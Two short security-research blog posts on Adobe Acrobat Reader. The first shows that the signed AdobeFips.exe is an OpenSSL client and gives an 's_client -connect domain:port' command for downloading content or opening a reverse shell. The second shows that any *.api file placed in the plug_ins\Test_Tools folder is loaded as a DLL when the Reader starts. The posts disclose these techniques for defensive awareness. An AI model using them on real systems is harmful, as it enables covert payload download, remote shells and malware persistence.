AdobeFips – Adobe Reader Lolbin

Posted on by

Sometimes ‘research’ means browsing the folders of the ‘installed ‘target’ and… just executing programs present inside these directories to see what they do.

During this very engaging and fascinating activity I noticed that the program:

c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\OSSLLibs\AdobeFips.exe

produces a very familiar output:

Yup, it is the OpenSSL client signed by Adobe:

Verified:       Signed
Signing date:   10:59 2024-01-13
Publisher:      Adobe Inc.
Company:        The OpenSSL Project, https://www.openssl.org/
Description:    OpenSSL application
Product:        The OpenSSL Toolkit
Prod version:   3.0.10
File version:   3.0.10
MachineType:    32-bit

so, one can run f.ex.:

AdobeFips.exe s_client -connect domain:port

to connect to the domain and download stuff (f.ex. via GET request), plus any other rich features OpenSSL offers (download, encryption, reverse shell, etc.).

Beyond good ol’ Run key, Part 144

Posted on by

The Acrobat Reader is a very popular software installed on millions of computers worldwide.

Today I noticed that anytime AcroRd32.exe program starts (tested with the latest version 24.4) it checks the following folder:

c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Test_Tools\

looking for *.api files.

All these files are then loaded as DLLs.

The screenshot below shows what happens when the following 3 files are present in the aforementioned folder:

  • aaFEAT.api
  • Automation.api
  • malware.api

The first two are named like the two legitimate *.api files that Acrobat Reader expects to find in the Test_Tools folder. The last one is just a randomly (well, not really) named DLL to show that any *.api file dropped there will be executed…